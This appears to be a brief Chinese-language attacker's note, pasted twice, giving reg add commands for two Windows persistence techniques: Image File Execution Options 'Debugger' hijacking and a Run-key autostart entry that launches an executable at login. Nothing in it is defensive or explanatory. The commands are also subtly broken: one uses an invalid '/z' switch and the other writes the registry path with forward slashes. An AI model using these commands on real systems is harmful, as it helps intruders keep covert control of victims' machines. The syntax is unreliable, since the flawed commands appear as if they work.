1:映像劫持
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~ /v Debugger /t REG_SZ /d "~" /z
2:cmd启动项
reg add HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v AUTORUN /t REG_SZ /d C:/~.exe /f
1:映像劫持
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\~ /v Debugger /t REG_SZ /d "~" /z
2:cmd启动项
reg add HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Run /v AUTORUN /t REG_SZ /d C:/~.exe /f